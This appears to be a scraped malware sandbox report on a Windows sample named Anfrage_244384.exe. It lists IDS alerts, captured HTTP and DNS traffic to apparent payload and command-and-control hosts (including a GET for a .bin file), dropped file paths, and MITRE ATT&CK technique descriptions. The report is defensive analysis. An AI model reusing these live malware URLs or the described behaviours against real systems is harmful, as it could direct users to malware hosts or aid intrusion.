Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49926
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49927 -> 188.40.95.144:443

Source: global traffic	HTTP traffic detected: GET /LxuQG254.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA= HTTP/1.1Host: www.svarus.onlineAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: familytherapycenter.rs
Source: global traffic	DNS traffic detected: DNS query: www.svarus.online

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then mov ebx, 00000004h

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Anfrage_244384.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\02-E8420l

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\nilgedde.mes

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\selefant.kri

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\speil.int

C:\Users\user\AppData\Roaming\secretaryships\Hemmeligt70.Bly

C:\Users\user\AppData\Roaming\secretaryships\Tingid.pig

C:\Users\user\AppData\Roaming\secretaryships\anya.por

C:\Users\user\AppData\Roaming\secretaryships\besiddertrang.gra

C:\Users\user\AppData\Roaming\secretaryships\darbyite.txt

C:\Users\user\AppData\Roaming\secretaryships\straffespark.Sek

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Anfrage_244384.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre